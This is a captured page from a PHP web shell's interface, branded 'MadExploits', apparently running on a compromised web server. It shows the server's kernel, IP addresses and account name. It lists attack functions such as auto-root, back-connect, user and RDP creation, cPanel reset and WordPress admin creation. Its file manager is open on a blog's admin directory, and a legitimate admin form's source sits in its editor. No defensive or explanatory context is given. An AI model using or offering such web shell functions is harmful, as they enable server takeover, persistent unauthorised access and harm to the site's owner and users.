Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.216.212.231
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
itailorBlog /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
page
[ DIR ]
drwxr-xr-x
add-blog-category-child.php
4.49
KB
-rw-r--r--
add-blog-category.php
3.58
KB
-rw-r--r--
add-blog-post.php
6.97
KB
-rw-r--r--
add-product.php
2.73
KB
-rw-r--r--
auth-login.php
3.71
KB
-rw-r--r--
blog-category-dashboard.php
5.25
KB
-rw-r--r--
blog-post-celebrity-style.php
5.98
KB
-rw-r--r--
blog-post-dashboard.php
4.73
KB
-rw-r--r--
blog-post-preferences.php
6.01
KB
-rw-r--r--
delete-category.php
667
B
-rw-r--r--
delete-post.php
656
B
-rw-r--r--
delete-product.php
650
B
-rw-r--r--
delete-subscriber.php
662
B
-rw-r--r--
edit-category.php
5.59
KB
-rw-r--r--
edit-post.php
7.61
KB
-rw-r--r--
edit-product.php
3.58
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
index.php
758
B
-rw-r--r--
logout.php
102
B
-rw-r--r--
products.php
4.61
KB
-rw-r--r--
save-category.php
1.61
KB
-rw-r--r--
save-child-category.php
1.69
KB
-rw-r--r--
save-post.php
2.43
KB
-rw-r--r--
save-preferences-must-read.php
1
KB
-rw-r--r--
save-preferences-style-prefere...
1.01
KB
-rw-r--r--
save-product.php
1.53
KB
-rw-r--r--
subscribers.php
3.81
KB
-rw-r--r--
update-category.php
2.23
KB
-rw-r--r--
update-post.php
2.94
KB
-rw-r--r--
update-product.php
1.67
KB
-rw-r--r--
uploadImage.php
120
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add-blog-category-child.php
<?php $config['seoTitle'] = 'Create Child Category | Admin | '; extract($config); ?> <?php require_once "inc/header.php" ?> <!--Content Start--> <div class="content-start transition "> <div class="container-fluid dashboard"> <form action="<?= htmlspecialchars('save-child-category.php') ?>" method="post"> <section class="section"> <div class="row"> <div class="col-12"> <div class="card"> <div class="card-header"> <h4 class="card-title"><i class='bx bx-plus'></i> Create Child Category</h4> </div> <div class="card-body py-3 pb-5"> <div class="mb-3"> <?php $categoriesData = getAllParentCategories(); ?> <label for="puri"><i class="bx bx-tag-alt"></i> Choose Parent Category</label> <select name="puri" id="puri" class="form-select formSelect"> <option value="">Choose Category</option> <?php if (mysqli_num_rows($categoriesData) > 0) { ?> <?php while ($row = mysqli_fetch_assoc($categoriesData)) { ?> <option value="<?= $row['uri'] ?>"><?= $row['name'] ?></option> <?php } } ?> </select> </div> <div class="mb-3"> <label for="name"><i class="bx bx-rename"></i> Category Name</label> <input type="text" name="name" id="name" class="form-control" placeholder="Enter here..." /> </div> <div class="mb-3"> <label id="summery"><i class='bx bxs-edit'></i> Category Summery</label> <textarea class=" form-control editor_basic" name="summery" id="summery" placeholder="Enter here..."></textarea> </div> <div class="mb-3"> <label id="editor"><i class='bx bxs-edit'></i> Category Content</label> <textarea class=" form-control editor" name="editor" id="editor" placeholder="Enter here..."></textarea> </div> <div class="mb-3"> <label for="title"><i class="bx bx-globe"></i> Category SEO Title</label> <input type="text" name="title" id="title" class="form-control" placeholder="Enter here..." /> </div> <div class="mb-3"> <label id="description"><i class='bx bx-globe'></i> Category SEO Description</label> <textarea class=" form-control" name="description" id="description" placeholder="Enter here..."></textarea> </div> <div class="mb-3"> <label id="keywords"><i class='bx bx-globe'></i> Category SEO Keywords</label> <textarea class=" form-control" name="keywords" id="keywords" placeholder="Enter here..."></textarea> </div> <div class="mb-3"> <button type="submit" class="btn btn-primary btn-lg"> <i class="bx bx-save"></i> Save Category </button> </div> </div> </div> </div> </div> </section> </form> <!-- End summernote --> </div><!-- End Container--> </div><!-- End Content--> <?php require_once "inc/footer.php" ?>
Close